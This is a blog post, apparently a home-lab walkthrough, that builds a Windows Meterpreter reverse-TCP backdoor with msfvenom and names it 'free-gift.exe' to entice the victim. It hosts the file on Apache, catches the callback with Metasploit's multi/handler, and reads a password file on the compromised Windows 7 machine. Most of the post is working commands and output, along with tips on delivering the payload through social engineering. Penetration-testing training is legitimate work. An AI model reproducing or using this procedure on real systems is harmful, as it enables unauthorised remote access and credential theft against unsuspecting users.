When threat actors (hackers) gain access to a system, they usually want future access as well, and they want it to be easy. A backdoor application can be installed by the attacker to either allow future access or collect information to use in further attacks. Many backdoors are installed by users clicking something without realizing that the link they clicked or the file they opened is a threat. Backdoors can also be implemented as a result of a virus, worm, or malware.
When threat actors gain access to a system, they also might be able to take several actions. The type of action depends on the level of access the threat actor has, or can achieve, and is based on permissions granted to the account compromised by the attacker. One of the most devastating actions available to an attacker is the ability to execute code within a device. Code execution could result in an adverse impact to the confidentiality, integrity, and availability of the system or network.
Run Apache web server on Kali Linux. This will be used to download the exploit on the Windows 7 machine.
I simply chose to Run the payload (.exe). The threat actor (hacker) will make the file (or URL) enticing in order for a successful attack.
Once the payload is downloaded and opened by the victim, Metasploit detected the session.
Once you've establish the remote (backdoor) session, you can start doing a reconnaissance on the machine by issuing various shell commands.
When threat actors gain access to a system, they also might be able to take several actions. The type of action depends on the level of access the threat actor has, or can achieve, and is based on permissions granted to the account compromised by the attacker. One of the most devastating actions available to an attacker is the ability to execute code within a device. Code execution could result in an adverse impact to the confidentiality, integrity, and availability of the system or network.
root@kali:~#
msfvenom -h
MsfVenom
- a Metasploit standalone payload generator.
Also a
replacement for msfpayload and msfencode.
Usage:
/usr/bin/msfvenom [options] <var=val>
Example:
/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o
payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are:
payloads, encoders, nops, platforms, archs, formats, all
-p, --payload <payload> Payload to use (--list payloads to list,
--list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s
standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to
list)
--smallest Generate the smallest
possible payload using all available encoders
-a, --arch <arch> The architecture to use for --payload and
--encoders (use --list archs to list)
--platform <platform> The platform for
--payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the
payload
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload
(defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file
to include
-x, --template <path> Specify a custom executable file to use as
a template
-k, --keep Preserve the --template
behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for
certain output formats
-t, --timeout <second> The number of seconds to wait when reading
the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
root@kali:~#
msfvenom -p windows/meterpreter/reverse_tcp
LHOST=192.168.1.110 LPORT=1234 --format=exe > free-gift.exe // LHOST IS KALI IP; CREATE A .exe WINDOWS PAYLOAD FILE
[-] No
platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No
arch selected, selecting arch: x86 from the payload
No
encoder or badchars specified, outputting raw payload
Payload
size: 341 bytes
Final
size of exe file: 73802 bytes
root@kali:~#
ls
Desktop Downloads Music
Public Templates Videos
yersinia.log
Documents free-gift.exe Pictures
sshd_config.save try2hack websites
Run Apache web server on Kali Linux. This will be used to download the exploit on the Windows 7 machine.
root@kali:~#
service apache2 status
â—
apache2.service - The Apache HTTP Server
Loaded: loaded
(/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
Active:
inactive (dead)
root@kali:~#
root@kali:~#
service apache2 <ENTER> // VIEW COMMAND COMMAND OPTIONS
Usage:
apache2 {start|stop|graceful-stop|restart|reload|force-reload}
root@kali:~#
root@kali:~#
service apache2 start
root@kali:~#
root@kali:~#
service apache2 status
â—
apache2.service - The Apache HTTP Server
Loaded: loaded
(/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
Active:
active (running) since Wed 2018-10-17 04:58:39 EDT; 2s ago
Process: 2278 ExecStart=/usr/sbin/apachectl
start (code=exited, status=0/SUCCESS)
Main PID: 2289 (apache2)
Tasks: 7 (limit: 2344)
Memory: 21.1M
CGroup: /system.slice/apache2.service
├─2289 /usr/sbin/apache2 -k
start
├─2290 /usr/sbin/apache2 -k
start
├─2291 /usr/sbin/apache2 -k
start
├─2292 /usr/sbin/apache2 -k
start
├─2293 /usr/sbin/apache2 -k
start
├─2294 /usr/sbin/apache2 -k
start
└─2295 /usr/sbin/apache2 -k
start
Oct 17
04:58:39 kali systemd[1]: Starting The Apache HTTP Server...
Oct 17
04:58:39 kali apachectl[2278]: AH00558: apache2: Could not reliably determine
the se
Oct 17
04:58:39 kali systemd[1]: Started The Apache HTTP Server.
Move the
payload file (.exe) to the Apache folder:
root@kali:~#
ls
Desktop Downloads Music
Public Templates Videos
yersinia.log
Documents
free-gift.exe Pictures
sshd_config.save try2hack websites
root@kali:~#
root@kali:~#
cp free-gift.exe /var/www/html
root@kali:~#
root@kali:~#
cd /var/www/html
root@kali:/var/www/html#
root@kali:/var/www/html#
ls
free-gift.exe
index.html
index.nginx-debian.html
You can
also use GUI by clicking on Files (folder icon) > Home > copy
free-gift.exe > Other locations > Computer > var > www > hmtl
Run the Metasploit database in order to successfully launch msfconsole.
root@kali:~#
service postgresql status
â—
postgresql.service - PostgreSQL RDBMS
Loaded: loaded
(/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
Active:
inactive (dead)
root@kali:~#
root@kali:~#
service postgresql start
root@kali:~#
root@kali:~#
service postgresql status
â—
postgresql.service - PostgreSQL RDBMS
Loaded: loaded
(/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
Active: active (exited) since Wed 2018-10-17
05:10:46 EDT; 2s ago
Process: 2605 ExecStart=/bin/true
(code=exited, status=0/SUCCESS)
Main PID: 2605 (code=exited, status=0/SUCCESS)
Oct 17
05:10:46 kali systemd[1]: Starting PostgreSQL RDBMS...
Oct 17
05:10:46 kali systemd[1]: Started PostgreSQL RDBMS.
Type
msfconsole to launch the Metasploit Framework and create the Windows exploit or payload.
root@kali:/var/www/html#
msfconsole
[-]
Failed to connect to the database: could not connect to server: Connection
refused
Is the server running on host
"localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not
connect to server: Connection refused
Is the server running on host
"localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
[*]
Starting the MetasploiT Framework console...-
[-]
Failed to connect to the database: could not connect to server: Connection
refused
Is the server running on host
"localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not
connect to server: Connection refused
Is the server running on host
"localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
,
,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F
| \
\ _____
| *
||| WW|||
||| |||
=[ metasploit v4.17.11-dev ]
+ -- --=[
1807 exploits - 1028 auxiliary - 313 post
]
+ -- --=[
539 payloads - 42 encoders - 10 nops
]
+ -- --=[
Free Metasploit Pro trial: http://r-7.co/trymsp
]
msf > db_status // CONNECT TO METASPLOIT DATABASE
[*]
postgresql connected to msf
msf > use exploit/multi/handler
msf
exploit(multi/handler) > set payload
windows/meterpreter/reverse_tcp
payload
=> windows/meterpreter/reverse_tcp
msf
exploit(multi/handler) > set LHOST
192.168.1.110
LHOST
=> 192.168.1.110
msf
exploit(multi/handler) > set LPORT 1234
LPORT
=> 1234
msf
exploit(multi/handler) > show options // VIEW PAYLOAD OPTIONS
Module
options (exploit/multi/handler):
Name
Current Setting Required Description
----
--------------- -------- -----------
Payload
options (windows/meterpreter/reverse_tcp):
Name
Current Setting Required Description
----
--------------- -------- -----------
EXITFUNC
process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST
192.168.1.110 yes The listen address (an interface may be
specified)
LPORT
1234 yes The listen port
Exploit
target:
Id
Name
--
----
0
Wildcard Target
msf
exploit(multi/handler) > exploit -h
Usage:
exploit [options]
Launches
an exploitation attempt.
OPTIONS:
-e <opt> The payload encoder to use. If none is specified, ENCODER is used.
-f
Force the exploit to run regardless of the value of MinimumRank.
-h
Help banner.
-j Run in the context of a job.
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL
format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index or name to use. If none is specified, TARGET is used.
-z Do not interact with the session after
successful exploitation.
msf
exploit(multi/handler) > exploit -j -z
[*]
Exploit running as background job 0.
[*]
Started reverse TCP handler on 192.168.1.110:1234
msf
exploit(multi/handler) >
Go to
Windows 7 machine and download the payload via the Apache web server running in Kali.
The exploit can be transferred by using other Social Engineering attack (email,
USB, mirrored website, etc).
I simply chose to Run the payload (.exe). The threat actor (hacker) will make the file (or URL) enticing in order for a successful attack.
Once the payload is downloaded and opened by the victim, Metasploit detected the session.
msf
exploit(multi/handler) > exploit -j -z
[*]
Exploit running as background job 0.
[*]
Started reverse TCP handler on 192.168.1.110:1234
msf exploit(multi/handler) > [*] Sending stage
(179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.110:1234
-> 192.168.1.130:49222) at 2018-10-17 05:26:51 -0400
msf
exploit(multi/handler) > sessions -i // VIEW SESSIONS
Active
sessions
===============
Id
Name Type Information
Connection
--
---- ---- -----------
----------
1
meterpreter x86/windows
WIN-7V0EVV4BKQJ\Administrator @ WIN-7V0EVV4BKQJ 192.168.1.110:1234 -> 192.168.1.130:49222
(192.168.1.130)
msf
exploit(multi/handler) > sessions -i 1 // ESTABLISH REMOTE SESSION ON ID 1
[*]
Starting interaction with 1...
Once you've establish the remote (backdoor) session, you can start doing a reconnaissance on the machine by issuing various shell commands.
meterpreter
> sysinfo
Computer : WIN-7V0EVV4BKQJ
OS : Windows 7 (Build 7601, Service
Pack 1).
Architecture : x86
System
Language : en_US
Domain : WORKGROUP
Logged On
Users : 1
Meterpreter : x86/windows
meterpreter
> ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware
MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4
Address : 127.0.0.1
IPv4
Netmask : 255.0.0.0
IPv6
Address : ::1
IPv6
Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface
11
============
Name : Intel(R) PRO/1000 MT Network
Connection
Hardware
MAC : 00:0c:29:6b:99:7a
MTU : 1500
IPv4
Address : 192.168.1.130
IPv4
Netmask : 255.255.255.0
IPv6
Address : fe80::104a:e373:9974:3524
IPv6
Netmask : ffff:ffff:ffff:ffff::
Interface
12
============
Name : Microsoft ISATAP Adapter
Hardware
MAC : 00:00:00:00:00:00
MTU : 1280
IPv6
Address : fe80::5efe:c0a8:182
IPv6
Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
I created
a text file in Windows 7 Desktop and put sensitive info such as usernames and passwords. Also notice the netstat output has an ESTABLISHED TCP session with Kali 192.168.1.110 on port 1234.
meterpreter
> pwd // VERIFY CURRENT DIRECTORY
C:\Users\Administrator\Desktop
meterpreter
> ls // LIST FILES
Listing:
C:\Users\Administrator\Desktop
=======================================
Mode Size Type
Last modified Name
---- ---- ----
------------- ----
100666/rw-rw-rw- 44
fil 2018-10-17 05:32:07
-0400 PASSWORDS.txt
100666/rw-rw-rw- 950
fil 2018-09-15 23:03:29
-0400 PuTTY.lnk
100666/rw-rw-rw- 282
fil 2018-09-15 22:50:44
-0400 desktop.ini
meterpreter
> cat PASSWORDS.txt // VIEW CONTENTS OF THE FILE
cisco
cisco123
admin cisco
admin admin
No comments:
Post a Comment